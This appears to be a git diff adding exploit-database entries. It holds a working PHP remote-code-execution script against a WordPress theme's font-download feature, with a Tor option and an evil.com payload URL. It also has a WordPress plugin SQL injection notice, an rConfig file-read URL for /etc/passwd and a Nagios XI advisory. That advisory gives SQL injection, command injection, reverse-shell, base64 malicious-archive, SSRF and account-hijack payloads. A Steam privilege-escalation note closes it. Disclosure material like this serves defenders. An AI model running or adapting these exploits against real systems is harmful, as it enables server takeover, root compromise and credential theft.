+require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:u:p:f:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + +function exploit(){ + global $curl, $options; + echo "Generateing payload.\n"; + $data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']); + echo "Sending payload\n"; + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Eco response: ".$resp."\n"; + $resp = json_decode($resp,true); + if ($resp['success'] === 'Font downloaded and extracted successfully.'){ + echo "Response ok, calling RCE\n"; + $file_path = parse_url($options['f']); + $remote_file_info = pathinfo($file_path['path']); + $zip_file_name = $remote_file_info['basename']; + $zip_file_name_php = str_replace('.zip', '.php', $zip_file_name); + $url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php; + echo 'Url: '. $url."\n"; + //POC Test mode + if ($file_path['host'] == 'wp0day.com'){ + echo "Exploit test mode on\n"; + $rnd = rand(); + echo "Rand $rnd, MD5: ".md5($rnd)."\n"; + $url = $url . '?poc='.$rnd; + } + $curl->get($url); + echo "RCE Response:"; + echo $curl->getResponse()."\n\n"; + } +} + + +logIn(); +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if ( !isset($options['f']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php + + + +Examples: + php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip + + Misc: + CURL Wrapper by Leonid Svyatov + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} diff --git a/platforms/php/webapps/39896.txt b/platforms/php/webapps/39896.txt new file mode 100755 index 000000000..f7a0c07d8 --- /dev/null +++ b/platforms/php/webapps/39896.txt @@ -0,0 +1,29 @@ +# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection +# Date: 06-06-2016 +# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +`$_POST['id']` is not escaped. + +`populate_download_edit_form()` is accessible for every registered user. + +http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html + + +2. Proof of Concept + +Login as regular user. + +
+ + +
+ +3. Solution: + +Update to version 2.1.0 \ No newline at end of file diff --git a/platforms/php/webapps/39898.txt b/platforms/php/webapps/39898.txt new file mode 100755 index 000000000..873b1d092 --- /dev/null +++ b/platforms/php/webapps/39898.txt @@ -0,0 +1,39 @@ +Title +=================== +rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion + +Summary +=================== +rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. + +Affected Products +=================== +rConfig 3.1.1 and earlier + +CVE +=================== +N/A + +Details +=================== +rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it. + +Verification of Vulnerability +=================== +The following steps can be carried out in duplicating this vulnerability. + +Step 1: +Enter the following into your browser address bar: + + http:///lib/crud/downloadFile.php?download_file=/etc/passwd + +Step 2: +Confirm that the passwd file is valid + +Impact +=================== +Information Disclosure. User privileges and unauthorized access to the system. + +Credits +=================== +Gregory Pickett (@shogun7273), Hellfire Security \ No newline at end of file diff --git a/platforms/php/webapps/39899.txt b/platforms/php/webapps/39899.txt new file mode 100755 index 000000000..2dad76819 --- /dev/null +++ b/platforms/php/webapps/39899.txt @@ -0,0 +1,268 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +Nagios XI Multiple Vulnerabilities +Affected versions: Nagios XI <= 5.2.7 + +PDF: +http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf + ++-----------+ +|Description| ++-----------+ +The Nagios XI application is affected by multiple security +vulnerabilities, including unauthenticated SQL injection and +authentication bypass, arbitrary code execution via command injection, +privilege escalation, server-side request forgery and account hijacking. + +These vulnerabilities can be chained together to obtain unauthenticated +remote code execution as the root user. + ++------------+ +|Exploitation| ++------------+ +==SQL Injection== +The ‘host’ and ‘service’ GET parameters in the ‘nagiosim.php’ page are +vulnerable to SQL injection via error-based payloads. An attacker can +exploit this vulnerability to retrieve sensitive information from the +application’s MySQL database such as the administrative users’ password +hash (unsalted MD5) or the token used to authenticate to the Nagios XI +REST API. This security issue is aggravated by the fact that an attacker +can directly browse to the vulnerable page and exploit the vulnerability +without providing a valid session cookie. + +[POC - DUMP ADMIN API TOKEN] +GET +/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+ +(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS ++CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2)) +x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1 + +The API token can be reused to bypass authentication either by creating +a user via the REST API or through the Rapid Response functionality as +shown below. + +[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY] +// uid == --, object id value +doesn't matter +GET /nagiosxi/rr.php?uid=1-b- HTTP/1.1 + +==Command Injection== +Multiple command injection vulnerabilities exist in the Nagios XI web +interface due to unescaped user input being passed to shell functions as +an argument. This issues can be exploited to inject arbitrary shell +commands and obtain remote code execution in the context of the 'apache' +user. + +URL => GET +/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=&title=&status= +PARAMETER => title +POC PAYLOAD => title'; touch /tmp/FILE; echo ' + +URL => GET +/nagiosxi/includes/components/perfdata/graphApi.php?host=&start=&end= +PARAMETERS => start, end +POC PAYLOAD => 1; touch /tmp/FILE; + +==Privilege Escalation== +The Nagios XI default sudoers configuration can be abused to elevate +privileges to root due to an insecure implementation of the +application’s component upload functionality. The ‘apache’ user can run +the getprofile.sh script with root privileges without being prompted for +a password. The getprofile.sh script is part of the Profile component +along with the following files: + +- profile.php, the PHP script that outputs the system information. +- profile.inc.php, a PHP include file with required functionality for +profile.php. + +An attacker can backdoor the profile.php file with a function to execute +arbitrary shell commands (e.g. ), replace +the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash +–i >& /dev/tcp// 0>&1”) and finally create a ‘profile.zip’ +archive containing the malicious component files. Once uploaded, the +application will unzip the component archive and overwrite the existing +profile directory and its files, including getprofile.sh. + +[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE] +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 +vREAAAAA + +[POC - PRIVILEGE ESCALATION EXPLOITATION] +GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo +./getprofile.sh + +The default Profile component archive can be downloaded at the following +link: +https://assets.nagios.com/downloads/nagiosxi/components/profile.zip + +==Server-Side Request Forgery== +Multiple server-side request forgery vulnerabilities exist in the Nagios +XI application. An attacker can provide arbitrary data to curl_exec +calls to port scan internal services listening on localhost, read files +on the Nagios XI server file system or send data to other hosts in the +same internal network where the Nagios XI server is deployed. + +// the application filter the string 'file://' can be bypassed by +converting the handler to uppercase +URL => GET /nagiosxi/ajaxproxy.php?proxyurl= +PARAMETER => proxyurl +POC PAYLOAD => FILE://// + +URL => GET /nagiosxi/backend/?cmd=geturlhtml&url= +PARAMETER => url +POC PAYLOAD => file://// + +==Account Hijacking== +The Nagios XI application is vulnerable to an arbitrary account +hijacking vulnerability due to an insecure implementation of the +password reset functionality. The application does not enforce any +verification to confirm the provided reset token can only be used to +change the login credentials for the specific user for which it was +generated. A limited user can therefore abuse the password reset +functionality to hijack an administrative account by tampering with the +‘username’ hidden parameter during the password reset process. + +[POC - ACCOUNT HIJACKING 'nagiosadmin'] +POST /nagiosxi/login.php?finishresetpass&username=stduser&token- HTTP/1.1 + +token=&username=nagiosadmin&password1=&password2=&reset=1 + ++----------+ +| Solution | ++----------+ +Upgrade to Nagios XI 5.2.8. + +Please note at the time of this writing the privilege escalation +vulnerability is still unpatched. The SSRF vulnerabilities have been +only partially fixed by blacklisting the 'file://' handler, but all the +other SSRF attack vectors are still exploitable. Vendor stated these +vulnerabilities will be likely patched on the next release of the +application as they require authentication and as such are not +considered major security issues. + ++------------+ +| Timeline | ++------------+ +13/05/2016 – Initial disclosure to vendor +14/05/2016 – Vendor confirms receipt of advisory +25/05/2016 – Vendor provides fixes for most of the vulnerabilities +25/05/2016 – Enquiry about the status of fixes for the unpatched +vulnerabilities +26/05/2016 – Vendor responded with “Since the major issues have been +fixed and the remaining issues I'd like to touch up are only available +if the user is logged in, or logged in as admin, I don't see a reason to +hold onto releasing the advisory.” +2/06/2016 – Public disclosure + ++------------+ +| Additional | ++------------+ +Further information is available in the accompanying PDF. +http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf diff --git a/platforms/windows/local/39888.txt b/platforms/windows/local/39888.txt new file mode 100755 index 000000000..6891fff56 --- /dev/null +++ b/platforms/windows/local/39888.txt @@ -0,0 +1,52 @@ +# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation +# CVE-ID: CVE-2016-5237 +# Date: 5/11/52016 +# Exploit Author: gsX +# Contact: gsx0r.sec@gmail.com +# Vendor Homepage: http://www.valvesoftware.com/ +# Software Link: http://store.steampowered.com/about/ +#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496 +# Tested on: Windows 7 Professional x64 fully updated. + + +1. Description: + +The Steam directory located at C:\Program Files (x86)\Steam implement weak +file permissions +and allow anyone in the BUILTIN\Users windows group to modify any file in +the Steam directory and any of its child files and folders. + +Since Steam is a startup application by default this makes it particularly +easy to achieve lateral/vertical privilege escalation and achieve code +execution against any user running the application. + + +2. Proof + +C:\Program Files (x86)>icacls Steam +Steam BUILTIN\Users:(F) + BUILTIN\Users:(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(F) + NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + +Successfully processed 1 files; Failed processing 0 files + + +3. Exploit: + +Simply backdoor/replace Steam.exe or any other related exe's/dll's with +the code you want to +run. + +I would like to note that I contacted Valve on several occasions +and gave them plenty of time to reply/fix the issue before releasing this +entry.